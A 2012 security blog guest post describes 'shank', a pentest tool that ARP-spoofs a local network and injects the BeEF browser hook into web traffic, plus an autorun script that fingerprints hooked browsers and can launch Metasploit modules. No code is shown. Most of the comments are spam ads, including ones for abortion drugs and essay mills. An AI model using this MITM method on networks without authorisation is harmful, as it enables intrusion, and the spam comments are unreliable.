Monday, December 31, 2012

BeEF Shank - BeEF MitM for Pentests

Happy New Year, everyone!

This guest post is brought to you by Ryan Linn.

At BlackHat Briefings this past summer, Steve Ocepek and I released Ruby code that would assist folks who want to use BeEF on internal penetration tests. Some may wonder, why would you want to do that? More and more internal resources are moving to Sharepoint, tools moving to web based intranet sites, and personal information moving away from mainframes and thick clients into web clients with database back-ends. Being able to attack the browser effectively on internal tests is going to become more crucial in giving realistic feedback on potential impact of an intrusion.

So our goal at BlackHat this year was to demonstrate how to effectively utilize the browser among local machines on the network. We created two tools to help utilize BeEF effectively on internal tests. The first was a tool called shank. Shank is an ARP Spoofing tool used to execute smarter Man-In-The-Middle (MITM) attacks injecting the BeEF hook into browsers surfing on the network.

Shank has two distinct parts. The first part is the MITM engine that begins by ARP spoofing the local network. Once the network has been successfully poisoned, shank begins polling the local BeEF instance to determine which browsers are already hooked. If shank sees a web response destined for a poisoned client that hasn’t already been hooked by BeEF, shank will insert the BeEF hook into the response. Once the browser is hooked, shank won’t inject another response until the BeEF hook is lost.  This ensures that while the browser is actively browsing the web, it will stay hooked by shank.

So where do we go from here? Once we have a browser hooked, we want to get as much information as we can from each browser.  BeEF lets us auto-run one module for each browser, but what if we wanted to do a large amount of fingerprinting for each browser we hook. This is where the autorun.rb comes into place.  For each browser we hook, we check in autorun.rb to detect if this is a new hook. If it is a new hook, we have an array of modules that we want to run against the hooked browser.

These modules can do anything from figure out what version of Java and Flash is running, to determining all the interfaces on a machine to determine if a VPN session is active or if a host is multi-homed. Based on that logic, and since this is all in Ruby, additional logic can be added for reactions based on the fingerprints such as auto-launching MSF modules, or other types of attacks based on versions of Flash or the presence of VPN interfaces. This increases the functionality of BeEF through external triggers thanks to Michele’s REST API interface.

Leveraging these tools can greatly enhance your internal penetration tests, and this is a proof of concept to help with internal tests. If you want to try any of this out for yourself, you can get the code at github. I also encourage you to checkout the whitepaper.

If you have any suggestions for other things to add to BeEF, feel free to add them to our feature tracker, and we’ll take a shot. If you’d like to help out with BeEF let us know!


  1. Hi great stuff!

    I was thinking that if you this type of attack could be integrated in BeeF?


  2. Thankful such an awesome sum for sharing this glorious information! I am envisioning see more posts by you. I like visiting you site since I always come across interesting articles like this one. Great Job, I greatly appreciate that. Do keep sharing! Your information is good and friendly this article very helpful for me. Thanks for the post. After seeing the following post, I totally inspire from you and your blogs also respectively. It was nice articles and I also very enjoyed after read this. Thanks a lot sir. Visit: Best essay writing service

  3. * Jual Obat Aborsi,,
    * Obat Aborsi,,
    * Obat Penggugur Kandungan,,
    * what I have read on this page is enough to make me satisfied can menik die this article thanks greetings *

  4. Writing an essay? Start with a good hook. Looking for some good hooks for essays? Click on a link!

  5. how to enable hey cortana in windows 10 hello cortana' is a feature on Windows 10 that lets your personal assistan

  6. I have read very important topics write my essay about the client resources. They are issued many updates on your work place for innovations. so we are given this article to reviews in online and thankful to have the great services.


  7. افضل شركات الاثاث المستعمل
    قد يحتاج البعض إلى شراء بعض قطع الأثاث اللازمة في المنزل لكن عند البحث في المحال التجارية يجدون أن الأسعار باهظة بشكل غير معقول لذلك قد يفكر الكثير من الأشخاص اللجوء إلى شراء الأثاث المستخدم والذي يكون في حالة جيدة لكن قد تنتابهم الحيرة في معرفة الشركة التي لا بد من التوجه إليها للبحث عن قطع الأثاث المناسبة ولماذا كل ذلك فكل ما عليك هو التواصل مع شركة شراء اثاث مستعمل والتي عادة ما توفر جميع قطع الأثاث التي يرغب في اقتنائها جميع العملاء مهما اختلفت طبقاتهم المجتمعية فجرب ذلك الأمر بنفسك ونعدك بأنك لن تندم أبداً على ذلك الاختيار.
    شراء الاثاث المستعمل بالدمام
    شراء اثاث مستعمل
    ارقام الاثاث المستعمل
    اتخاذ القرار الحاسم بالتوجه إلى جهة معينة لشراء الأثاث المستعمل منها أمر ليس سهل إطلاقاً لكن عندما يكون لديك خلفية معرفية عن كل شركة فهذا بالطبع سيساعدك على اختيار ما هو أفضل لك ولكل أفراد أسرتك لذلك فسنطلعك في النقاط التالية على أهم المميزات التي تمتلكها شركة شراء اثاث مستعمل وذلك لكي تطمئن في حالة التعامل معها:
    • توفير جميع أنواع الأثاث اللازم لكل منزل مثل غرف النوم وأطقم الصالونات والأنتريهات هذا بالإضافة إلى المجالس وغرف النوم الخاصة بالأطفال.
    • يوجد بشركتنا المتميزة العديد من أجهزة الحاسب الآلي وتتميز باختلاف أحجامها وأنواعها وأسعارها وهذا لكي تناسب جميع عملائنا الكرام.
    • إذا كنت تبحث عن شراء الأجهزة الكهربائية المنزلية مثل الثلاجات وأجهزة التكييف ففي شركتنا ستجد أنواع متميزة لا حصر لها يمكنك اختيار ما يحلو لك منها.
    • يمكنك من خلال شركتنا المتميزة شراء جميع أدوات المطبخ مثل غسالات الأطباق وأفران الميكروويف والأفران العادية.
    • لا تخشى عملية نقل الأثاث إلى منزلك حيث أن شركة شراء اثاث مستعمل توفر العديد من الشاحنات ذات الأحجام المختلفة لمساعدتك في نقل جميع الأثاث الذي قمت باختياره وشرائه إلى منزلك بشكل آمن.
    • خدمة العملاء التابعة لنا تعمل على مدار 24 ساعة وهذا لاستقبال جميع اتصالاتكم الهاتفية وكافة استفساراتكم.
    • يتم عرض جميع الأثاث المتوفر لدينا بشكل مرتب ومنظم هذا بالإضافة إلى أن أسعارنا لا يوجد لها منافس.

    شراء الاثاث المستعمل
    شراء اثاث
    حقين الاثاث المستعمل

  8. Students could often find it tough to write their academic tasks. It could lead to they not getting desired grades in the academics. Opting for our Assignment help could be ideal for such students and they can get a complete assignment solution from us.

  9. Good Post! Thank you so much for sharing this pretty post, it was so good to read and useful to improve my knowledge as updated one, keep blogging.

    Selenium with python Training in Electronic City

  10. All Assignment Help is a web portal where students get help in making assignments for all the subjects, with the help of our experts. You will get 100% plagiarism free assignment. Expertes consultation is also available for students. If they have any query they can contact with our experts anytime.

  11. Those who are searching over internet matlab assignment help can contact with us now. We are the best assignment writing service provider in melbourne, Australia. Our Academic assignment writers available 24*7 hours for the students, if you really want to need IT assignment help, java assignment help, programming assignment help, r programming assignment help, case study assignment help online at cheapest price and get high distinction grades.

  12. Searching out a penetration trying out a framework to offer protection awareness? Strive for the browser exploitation framework. The ability to modify content transferred between two hosts the usage of the guy inside the center (mitm) assaults is a network attack vector. Info Knowledge Shared by Do My Dissertation Help Cheap | All Assignment Help Australia

  13. Thank you for your post, I look for such article along time. And do you want to leave the virtual worth yourself? If you want, let go to the game sims 4 cheats. Click link to participate game.

  14. Nice article this post is very useful to every people
    Thank You
    You Check Also Read This Post :- best anime streaming sites

  15. very nice post and detail work done by the article and it shows how good you are in writing good stuff please check and check my work

  16. very nice post and detail work done by the article and it shows how good you are in writing good stuff please check and play any game

  17. very nice post and detail work done by the article and it shows how good you are in writing good stuff please kisscartoon and watch any cartoon you want

  18. very nice post and detail work done by the article and it shows how good you are in writing good stuff please check kik usernames and find all kik users